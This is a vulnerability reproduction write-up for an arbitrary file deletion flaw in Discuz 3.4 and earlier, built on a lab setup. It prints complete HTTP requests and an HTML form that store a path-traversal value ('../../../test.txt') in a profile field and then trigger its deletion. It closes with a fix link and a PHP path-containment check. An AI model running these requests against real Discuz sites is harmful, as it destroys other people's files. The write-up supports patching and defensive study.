Preface: On September 29, Discuz fixed a front-end arbitrary file deletion vulnerability. A similar vulnerability had been submitted to WooYun and to Discuz officially back in 2014, but the incomplete fix led to this one. Many posts online say the official 3.4 version has already been fixed, but the environment I used is the 3.4 version from vulhub, so rather than argue about whether 3.4 is fixed or not, I just reproduced it directly.

Affected versions: Discuz <= 3.4

Environment:

Reproduction steps: First, create a new test.txt file in the discuz directory; this is the file that will be deleted later.

[Screenshot: creating test.txt]

Visit http://192.168.220.131/home.php?mod=spacecp, then open the browser's element inspector, look up the value of formhash and copy it.
[Screenshot: viewing formhash]

Use Burp to capture the request and obtain the cookie.
[Screenshot: capturing the cookie]
Send the packet below, substituting your own cookie, your formhash, and the file to be deleted:
POST /home.php?mod=spacecp&ac=profile&op=base HTTP/1.1
Host: localhost
Content-Length: 367
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryPFvXyxL45f34L12s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: CmcL_2132_saltkey=b9yKqToA; CmcL_2132_lastvisit=1577934646; CmcL_2132_sid=I21Fam; CmcL_2132_lastact=1577951222%09misc.php%09patch; CmcL_2132__refer=%252Fhome.php%253Fmod%253Dspacecp; CmcL_2132_seccode=1.1f5dbc9f8f51267031; CmcL_2132_ulastactivity=f7c74D32skNeZM0YcFOOaQUi7XmBcai6jjji8MGC7px2%2BTiSN9qM; CmcL_2132_auth=8bf5qD72m1LL4vx%2BXQAGHjNEfio4ELQqrhkkrwz%2FdcuiSxXlRhnYfpwxloZj5lqVp6zUrThf%2FVYOcWS9xQwm; CmcL_2132_lastcheckfeed=2%7C1577938266; CmcL_2132_lip=192.168.220.1%2C1577938056
Connection: close

------WebKitFormBoundaryPFvXyxL45f34L12s
Content-Disposition: form-data; name="formhash"

84a7f376
------WebKitFormBoundaryPFvXyxL45f34L12s
Content-Disposition: form-data; name="birthprovince"

../../../test.txt
------WebKitFormBoundaryPFvXyxL45f34L12s
Content-Disposition: form-data; name="profilesubmit"

1
------WebKitFormBoundaryPFvXyxL45f34L12s--
[Screenshot: sending the packet that stores the path to delete]

Refresh the page; the birthplace field will now show the state in the screenshot below:

[Screenshot: data written successfully]

This shows the value has been stored in the database.

Next, create an upload.html with the following code, changing the IP to your Discuz domain and [form-hash] to your own formhash:
<form action="http://192.168.220.131/home.php?mod=spacecp&ac=profile&op=base&deletefile[birthprovince]=aaaaaa" method="POST" enctype="multipart/form-data">
<input type="file" name="birthprovince" id="file" />
<input type="text" name="formhash" value="84a7f376" />
<input type="text" name="profilesubmit" value="1" />
<input type="submit" value="Submit" />
</form>
Or build the packet directly:
POST /home.php?mod=spacecp&ac=profile&op=base&profilesubmit=1&formhash=84a7f376 HTTP/1.1
Host: 192.168.220.131
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------123821742118716
Content-Length: 91989
Connection: close
Cookie: CmcL_2132_saltkey=b9yKqToA; CmcL_2132_lastvisit=1577934646; CmcL_2132_sid=I21Fam; CmcL_2132_lastact=1577951222%09misc.php%09patch; CmcL_2132__refer=%252Fhome.php%253Fmod%253Dspacecp; CmcL_2132_seccode=1.1f5dbc9f8f51267031; CmcL_2132_ulastactivity=f7c74D32skNeZM0YcFOOaQUi7XmBcai6jjji8MGC7px2%2BTiSN9qM; CmcL_2132_auth=8bf5qD72m1LL4vx%2BXQAGHjNEfio4ELQqrhkkrwz%2FdcuiSxXlRhnYfpwxloZj5lqVp6zUrThf%2FVYOcWS9xQwm; CmcL_2132_lastcheckfeed=2%7C1577938266; CmcL_2132_lip=192.168.220.1%2C1577938056
Upgrade-Insecure-Requests: 1

-----------------------------123821742118716
Content-Disposition: form-data; name="birthprovince"; filename="0.jpg"
Content-Type: image/jpeg

zerba (anything can go here)
-----------------------------123821742118716--
Go back into the Discuz directory and check: the test.txt file has been deleted.
Fix recommendation: https://gitee.com/ComsenzDiscuz/DiscuzX/commit/7d603a197c2717ef1d7e9ba654cf72aa42d3e574

Edit the file upload/source/include/spacecp/spacecp_profile.php and remove the unlink-related code.
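The root cause visible in the steps above is that a profile field value under the user's control (birthprovince, set to ../../../test.txt) is later handed to unlink(). Below is an added example, not Discuz's own code, of the containment check such a deletion helper should perform before deleting anything; the helper name, directory layout and file names are assumptions constructed for the demo.

```php
<?php
// Added example, not Discuz's own code: the containment check a profile-attachment
// deletion helper should perform before it ever calls unlink(). Paths, file names
// and the helper name are constructed for this demo.

/**
 * Return the absolute path that may be deleted, or null when the stored value
 * (e.g. the birthprovince field written above) must not be trusted.
 */
function safe_profile_attachment_path(string $attachDir, string $stored): ?string
{
    // Lexical filter: only a relative name of safe characters with an image
    // extension, which is all the upload code itself would ever have stored.
    if (!preg_match('#^[A-Za-z0-9_./-]+\.(jpe?g|gif|png)$#i', $stored)) {
        return null;                             // e.g. ../../../test.txt
    }
    $root = realpath($attachDir);
    $target = $root === false ? false : realpath($root . '/' . $stored);
    if ($target === false) {
        return null;                             // missing root or missing file
    }
    // Containment: after resolving ".." and symlinks, the target must still sit
    // below the attachment root, otherwise the deletion is refused.
    $prefix = rtrim($root, '/') . '/';
    return strncmp($target, $prefix, strlen($prefix)) === 0 ? $target : null;
}

// Demo: a throwaway attachment root holding one legitimate avatar, plus a symlink
// inside it that points at an image one level above the root (the test.txt case).
$pid = getmypid();
$root = sys_get_temp_dir() . "/dz_profile_$pid";
$outside = sys_get_temp_dir() . "/outside_$pid.jpg";
mkdir("$root/common", 0700, true);
touch("$root/common/abc_avatar.jpg");
touch($outside);
symlink($outside, "$root/common/link.jpg");

foreach (['common/abc_avatar.jpg', '../../../test.txt', 'common/link.jpg'] as $v) {
    $p = safe_profile_attachment_path($root, $v);
    echo str_pad($v, 24), $p === null ? 'refused' : "would unlink $p", PHP_EOL;
}

// Clean up the demo files.
foreach (["$root/common/link.jpg", "$root/common/abc_avatar.jpg", $outside] as $f) {
    unlink($f);
}
rmdir("$root/common");
rmdir($root);
```

Only the legitimate avatar passes; the traversal value fails the lexical filter and the symlink fails the containment check even though its name looks harmless.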